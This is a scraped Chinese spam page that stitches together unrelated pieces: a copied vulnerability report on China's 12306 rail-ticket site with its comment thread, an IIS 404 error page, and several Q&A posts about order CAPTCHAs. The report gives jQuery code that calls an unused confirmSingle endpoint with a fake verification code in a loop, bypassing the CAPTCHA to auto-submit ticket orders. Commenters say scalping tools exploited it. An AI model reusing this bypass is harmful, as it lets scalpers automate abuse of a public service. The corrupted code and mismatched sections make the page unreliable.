聚美怎么修改已淘宝提交订单要验证码的验证信息资料

来源:蜘蛛抓取(WebSpider) 时间:2015-02-28 02:48 标签: 淘宝怎么提交订单
分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
12306的订单提交逻辑中,存在目前未使用的逻辑接口,且此接口对验证码没有进行任何校验,从而导致用户可以使用一定的方式绕过验证码直接提交订单,并且不需要任何排队。
详细说明:
12306的前端订单逻辑处理中,存在一个提交订单的 confirmPassenger/confirmSingle 接口。此接口目前没有在12306本身用到,但是这个接口依然可以提交订单,并且完全无需验证码。
以下代码摘自网上,经测试完全有效,提交的验证码是错误(根本没有)的,但是完全被confirmSingle接口无视。
code 区域$(&#randCode2&).unbind('keyup');
function bO() {if ($(&#sf2&).is(&:checked&)) {return &0X00&} else {return &ADULT&}};
$(&#randCode2&).on(&click&,
function(bR) {
url: ctx+&passcodeNew/checkRandCodeAnsyn&,
type: &post&,
randCode: $(&#randCode2&).val(),
rand: &sjrand&
async: false,
success: function(bS) {
bb = $(&#randCode2&).val();
$(&#back_edit&).trigger(&click&);
url: ctx + &confirmPassenger/confirmSingle&,
type: &post&,
passengerTicketStr: getpassengerTicketsForAutoSubmit(),
oldPassengerStr: getOldPassengersForAutoSubmit(),
tour_flag: &dc&,
randCode: $(&#randCode&).val(),
purpose_codes: bO(),
key_check_isChange: md5Str,
train_location: location_code
dataType: &json&,
async: true,
success: function(bR) {
otsRedirect(&post&, ctx + &payOrder/init?random=& + new Date().getTime(), {})
error: function(bR, bT, bS) {
$(&#randCode2&).removeClass(&inptxt w100 error&).addClass(&inptxt w100&);
$(&#i-ok2&).css(&display&, &block&);
$(&#c_error2&).html(&&);
$(&#c_error2&).removeClass(&error&);
bb = $(&#randCode2&).val()
setInterval(function(){
if($('#autosubmitcheckticketinfo').css('display')!='none'){
$(&#randCode2&).val('xxoo');$(&#randCode2&).trigger('click');
漏洞证明:
修复方案:
鉴于此接口目前并没有用到,建议屏蔽。
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:15
确认时间: 15:35
厂商回复:
当日已修复。忘记确认了。多谢!
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
速度围观 沙发在这!
路人甲,你这么吊,铁道学院终于知道了!
顺便可怜我这个回家没买到票,回公司又没买到票的人吧!
这个是12306插件的作者呀..
发现有个漏洞报告类似的
,不知道是不是重复的漏洞报告。如果是相同的话,居然还没修复?
@木鱼 木鱼为啥不整合到NET版软件里啊,我还没买到票,可怜
@web天空 我看到缺陷和漏洞,不会利用。别人不要人品见缝就钻,我做不出来。良好的购票秩序是每个人共同来维护的。的确黄牛很多,利用这些漏洞的软件卖钱、囤票赚钱的也很多,但是这是不义之财,我不要。
发现漏洞很多人都能做到,但是发现后会怎么处理,体现出一个人的人品。发现后,不是为服务方改进体验完善产品的,而是为自己谋取好处赚取利益的,人品负分滚粗。
我希望每个人都能买到票,但这不代表我希望人们都以暴制暴,看到黄牛利用漏洞、用暴力手段,自己就也要用,非要跟他们玩命才觉得公平。
话说回来,没买到票的话,不要气馁。除非车已经开走,否则你都有机会。除此以外,还有很多其他方式可以选择。
祝你好运。
@木鱼 你的软件很好用,我介绍给我几个同事,他们都抢到回家的票了.我不需要买票,但是还是很感谢你为他们付出了这么多精力,毕竟一款免费软件不好做.
支持!@木鱼 如果黄牛知道了 正常用户就别指望买到票了!
还是短途车好呀,买硬座票,享受卧铺的待遇。
@齐迹 据我所知已经有部分收费软件已经在使用此漏洞了
@木鱼 谢谢大神的Chorme插件 我用它抢火车票定飞机票很久啦~~~
目测漏洞已经被修复了,可是12306不来认领。。
@木鱼 是不是传说中的木鱼啊?
@Leon 是啊。。。。
登录后才能发表评论,请先淘宝提交订单前要写验证码是怎么回事
淘宝提交订单前要写验证码是怎么回事
不区分大小写匿名
不需要,可能你是异常登录
我也出现这问题了,上淘小二那问了,说是普通会员是每3次购物就要输入一次验证码!!!
相关知识等待您来回答
互联网领域专家无法找到该页
无法找到该页
您正在搜索的页面可能已经删除、更名或暂时不可用。
请尝试以下操作:
确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。
如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。
单击按钮尝试另一个链接。
HTTP 错误 404 - 文件或目录未找到。Internet 信息服务 (IIS)
技术信息(为技术支持人员提供)
转到 并搜索包括&HTTP&和&404&的标题。
打开&IIS 帮助&(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为&网站设置&、&常规管理任务&和&关于自定义错误消息&的主题。我在12306购票在提交订单时找不到输入验证码的提示。是怎么回事呀!以前购票都很正常的_百度知道
我在12306购票在提交订单时找不到输入验证码的提示。是怎么回事呀!以前购票都很正常的
提问者采纳
有提示啊。现在123订罚斥核俪姑筹太船咖06网站采用图片验证码的方式。他给出几张图片,然后在图片上方给出提示,请找出所有的××,看清楚是所有的,然后单击你选择的图片就好了。
你把界面截屏给我
我在一切都操作完,到该提交订单的时候了。却找不到输入验证码图片的
网上退票怎么操作?
提问者评价
太给力了,你的回答完美地解决了我的问题,非常感谢!
其他类似问题
12306的相关知识
按默认排序
其他3条回答
我跟你遇到同样的问题,怎么解
正在买票中
知道怎么退票吗?提前多久退票不收手续费
提前十五天
十五天以内收取手续费
我找到输入验证码的办法了,在提交订单的界面有一副图片你看提示,要你在图片里选择哪一类图片,你选完了就可以提交订单了就可以了
关掉网页重试看看
重试了好多次
那是不是官网在维护呢,不急的话换个点试试
是不需要填写验证码了吗
下面是一副广告呀
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁为什么在当当网提交订单时的验证码输入不了_百度知道
为什么在当当网提交订单时的验证码输入不了
输入验证码后都不行,按提交订单还要你输入正确的,明明是正确的
提问者采纳
这是因为当当网后台系统的故障 你等一下就可以了!
其他类似问题
当当网的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁

我要回帖

更多关于 淘宝怎么提交订单 的文章

 

随机推荐